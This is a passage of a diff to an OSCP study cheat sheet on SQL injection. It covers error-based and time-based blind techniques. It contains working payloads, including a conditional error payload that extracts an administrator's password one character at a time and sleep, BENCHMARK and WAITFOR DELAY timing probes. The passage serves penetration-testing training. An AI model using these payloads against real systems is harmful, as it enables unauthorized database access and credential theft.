jonnyzar/OSCP_CheatSheets/Cheat_Sheets/sql_cheatsheet.md

 1' or 1=2# returns error or negative response
 ```

+If the first letter of Password is 's' then this query is going to return some Error

+`' OR (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a`

 #### Time based

+If time based injection is valid then for TRUE conditions certain amount of delay shall be present.

 ```
 ' AND sleep(15)#

 Benchmark:

 ' AND BENCHMARK(10000000,SHA1(1337))#
 ```
+Sometimes it will be needed to concatenate the strings to make it work.
+Try it if everything else fails:

+`|| sleep(15)--`

+##### Exploitation of time based BLIND SQLi

+1. Detect it time based sqli by using time delays:

+`'; IF (1=1) WAITFOR DELAY '0:0:10'--` shall cause a time delay

+If it doesn't work use payload cheat sheets mentioned above to identify correct datase type.

 # Get shell from sql-injection